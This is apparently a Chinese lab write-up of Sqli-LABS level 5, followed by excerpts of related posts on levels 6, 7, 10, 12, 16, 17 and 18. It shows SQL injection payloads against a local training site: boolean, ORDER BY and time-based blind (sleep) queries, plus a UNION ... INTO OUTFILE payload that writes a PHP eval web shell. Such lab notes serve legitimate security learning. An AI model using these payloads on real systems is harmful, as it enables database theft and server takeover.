Sqli-LABS通关笔录-5

奇怪了，咋那么顺利。看下图：

直接构造payload:

http://127.0.0.1/sql/Less-5/index.php?id=-1‘ or 1=1 --+

猜解字段：

http://127.0.0.1/sql/Less-5/index.php?id=-1‘ order by 3 --+        无回显

http://127.0.0.1/sql/Less-5/index.php?id=-1‘ order by 4 --+        回显无该条款

我就说，咋就那么顺利。麻烦来了

没有爆出显示位。这简单，一个个猜呗。先猜第一个是显示位，第二个第三个...推呗。然而事实是并不行。有部分可能无显示，但是源码内可见。我也都看了一遍源码内都没有。

研究源码发现，其实根本没有做什么输出，大概知道是用盲注，但是有点懵B中。因为不懂盲注。

95zz给出了

根据页面是否返回真假来判断语句是否正常执行

....盲注改日再研究吧。

时间： 2024-10-29 19:07:54

Sqli-LABS通关笔录-5的相关文章

Sqli-LABS通关笔录-10

好像咋整都没辙.实在是关卡越高越不好整. 弄报错.咋整咋不报错. and sleep(10);鸭蛋的也不好搞.实在没辙.就看源码了. 由代码得出payload: THE END Sqli-LABS通关笔录-10

Sqli-LABS通关笔录-6

第六关跟第五关一样的是布尔型盲注技术. 只是在部分有出路添加一个单引号.程序无反应.双引号和斜杠可使其报错. 这一关让我学到了 1.管他三七二十七报错看看语句再说. THE END Sqli-LABS通关笔录-6

Sqli-LABS通关笔录-7[文件写入函数Outfile]

该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用. 通过源代码我们很容易的写出了payload.倘若我们一个个去尝试的话,说实话,不容易. http://127.0.0.1/sql/Less-7/index.php?id=1')) and 1=1--+ Payload: http://127.0.0.1/sql/Less-7/index.php?id=1')) union select 1,'<?php eval($_POST[cmd])?>',3 into outfi

Sqli-LABS通关笔录-17-审计SQL注入

这个关卡开始好像进入新的知识区了,前面几个是让我们加深对盲注的印象.接下来又是新知识了!皮卡丘,接招吧! 代码是从SQL-libs的第十七关卡扣的. 页面效果如下所示: PHP面完整CODE如下所示: 1 <?php 2 include("../sql-connections/sql-connect.php"); 3 error_reporting(0); 4 5 function check_input($value) #定义一个函数为check_input,里面有一个参数为$

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

Sqli-LABS通关笔录-12

通过这个关卡我学习到了: 1.双引号千万别忘记,就是因为忘了弄了好一会儿.一直不报错. 2. 00x1万能密码构造二报错的内容为: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin") LIMIT 0,1' at line 1 可以看出,他在我们输入的哪里多加了一个

Sqli labs相关环境的下载与安装

我们在学习这项内容之前,需要安装两样应用程序,下载路径的搜索比较麻烦,这里提供两个已知的百度网盘网址及其提取码以供使用: 1.安装phpstudy; 链接:https://pan.baidu.com/s/1yeOLf7Mty5bEGLPUSodILg 提取码:y3vl 2.安装sqli-labs-masters; 将sqli-labs-masters解压,放到phpStudy安装目录下的/PHPTutorial/WWW 链接:https://pan.baidu.com/s/1aKbc0fnsLg

Sqli-LABS通关笔录-18-审计SQL注入2

1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/sql-connect.php"); 4 error_reporting(0); 5 6 function check_input($value) 7 { 8 if(!empty($value)) 9 { 10 // truncation (see comments) 11 $value = substr($value

Sqli-LABS通关笔录-16

这个关卡之前我还使用了一下工具跑,发现居然跑不出来.这就尴尬了.行吧手工试试. payload admin") and If(ascii(substr(database(),1,1))=115,sleep(5),1)#